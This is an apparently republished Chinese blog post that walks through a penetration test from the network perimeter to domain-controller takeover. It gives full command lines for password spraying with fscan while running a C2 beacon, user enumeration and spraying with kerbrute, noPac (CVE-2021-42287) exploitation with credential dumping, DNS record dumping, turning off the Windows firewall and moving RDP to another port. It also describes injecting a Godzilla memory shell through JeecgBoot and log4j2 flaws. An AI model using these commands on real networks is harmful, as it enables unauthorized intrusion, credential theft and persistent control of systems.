ez突破边界到内网渗透

admin 2024年8月19日11:11:26评论37 views字数 2714阅读9分2秒阅读模式

前言:

已经有好久没有发过文章了,最近也是比较闲,想着随便写一点,由于一些案例比较久,文章有些内容没有截图,只能去靠文字去描述一些方法

利用ez打点:

这里安利一下ez扫描器,个人感觉这款扫描器还是挺好用的,比如扫一些log4j2或者fastjson这种效果还是比较好的,这次比赛中有几个log4j2插件没扫出来,ez可以扫出来

配置反连地址:

https://docs.ezreal.cool/docs/EZUSE/ez-reverse

根据官方文档在vps的配置文件config.yaml中配置好相应的信息:

# 反连平台配置
reverse:
# 如 test123
token: nihao_shijie_001
# 如1.1.1.1:8080
http: 0.0.0.0:80
# 如 a.evildomain.com
dns: testlog.aaaaaaa.com
# 如 1.1.1.1:8082
rmi: 0.0.0.0:891
# 如 1.1.1.1:8083
ldap: 0.0.0.0:5555

vps运行:

./ez reverse

在自己机器上的confi.yaml文件中填好对应的反连信息,

ez突破边界到内网渗透

可以用ez --check-reverse webscan验证

如图,就是代表反连可以正常使用

ez突破边界到内网渗透

主动扫描:

网上有个xray联动rad和crawlergo的一个python脚本

https://github.com/mrknow001/Crawlergo_x_Rad_x_XRAY

这里我们可以把它改一下,直接用于联动ez

配置好https://github.com/mrknow001/Crawlergo_x_Rad_x_XRAY/blob/main/launcher.py的路径

配置好Crawlergo,rad和ez路径,直接将url放进target.txt里面,运行该python脚本即可:

ez突破边界到内网渗透

被动扫描:

ez的被动扫描还是能带来惊喜的

被动扫描插件的话我用的是这个:

https://github.com/winezer0/passive-scan-client-plus

可以支持高版本java运行,而且在流量这方面目前没有感觉到有啥问题

ez突破边界到内网渗透

某naginx页面jeecgboot命令执行:

ez突破边界到内网渗透

被动扫描获取到一个jeecgboot信息泄露:

ez突破边界到内网渗透

这里我们就知道这个网站使用了jeecgboot框架:利用历史漏洞,直接收获一枚rce:

ez突破边界到内网渗透

注入哥斯拉内存马:

公众号回复20240818获取内存马payload:

ez突破边界到内网渗透

ez突破边界到内网渗透

至此,拿下该nginx页面的网站:

某log4j2漏洞:

这个漏洞当时也是用ez直接出了,插件都没扫出来:

ez突破边界到内网渗透

成功获取到系统权限:

ez突破边界到内网渗透

利用魔改版jndi工具注入内存马获取权限:

ez突破边界到内网渗透

内网:

内网的话大家打起来都比较粗暴,大部分都是fscan一把梭哈,拿着密码不断去碰撞,这里就不写怎么多了,简单描述一些方法

通过log4j2漏洞进入内网:

通过反编译源码,获取到数据库密码:

ez突破边界到内网渗透

利用改密码进行密码喷洒,喷洒时执行上线c2命令,这里我选择上线vshell

这里也是推荐大家在扫描时,上线一下c2,防止在扫描过程中掉线而没来及做权限维持

fscan.exe -h ip段 -p service -c "c2命令"

这里上线了几台机器,便于做权限维持

ez突破边界到内网渗透

利用密码碰撞拿到了oa的数据库,获取到了oa的账户和用户名,这为下一步打域控做了基础

ez突破边界到内网渗透

利用Kerberos Pre-Authentication进行域内用户暴力破解

工具:https://github.com/ropnop/kerbrute

在这之前已经通过mssql弱口令拿下了几台域用户机器,但是有一些杀软,不太好操作,因为从数据库中获取到了oa的账户密码,所以想着利用该方法进行暴力破解域用户密码:

暴力破解域用户:

将oa用户名作为一个字典:

kerbrute_windows_amd64.exe userenum --dc 1.1.1.1 -d attack.com  .user.txt

然后将爆破出来的域用户作为字典,随便选取一个密码来进行暴力破解:

kerbrute_windows_amd64.exe passwordspray --dc 1.1.1.1 -d attack.com user.txt xx123456

爆破出来了一个域用户

利用cve2021-42287拿下域控:

proxychains python3 noPac.py attack.com/administrator:'xx123456' -dc-ip 1.1.1.1 -dc-host DC -dump --impersonate administrator

ez突破边界到内网渗透

pth攻击拿下域控:

ez突破边界到内网渗透

dump域内dns记录:

proxychains python3 dnsdump.py -u 'xxx.cnadministrator' -p xxxxx 1.1.1.1 -r

可以看到,这个域还是比较大的,2w多台机器

ez突破边界到内网渗透

RDP登录域控:

这里有一个小技巧,也是很常见的一个问题,这里我登陆域控的时候,通过命令正常打开了远程桌面和关闭防火墙:

##打开rdp:
REG ADD HKLMSYSTEMCurrentControlSetControlTerminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
##关闭防火墙:
netsh advfirewall set allprofiles state off

这里通过命令查看,rdp端口确实为3389:

ez突破边界到内网渗透

登陆的时候无法与rdp建立连接,端口扫描也无法探测到3389端口:

这个时候可能是该机器的rdp端口做了连接限制,我们将rdp端口进行修改就能正常登陆了:

#关闭RDP
REG ADD "HKLMSYSTEMCurrentControlSetControlTerminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000001 /f

#修改3389端口
reg add "HKEY_LOCAL_MACHINESystemCurrentControlSetControlTerminal ServerWinStationsRDP-Tcp" /v "PortNumber" /t REG_DWORD /d 33389 /f

#开启RDP
REG ADD "HKLMSYSTEMCurrentControlSetControlTerminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

#关闭防火墙
netsh advfirewall set allprofiles state off
netsh advfirewall show allprofiles

原文始发于微信公众号(安全小子大杂烩):ez突破边界到内网渗透

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年8月19日11:11:26
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   ez突破边界到内网渗透http://cn-sec.com/archives/3078628.html

发表评论

匿名网友 填写信息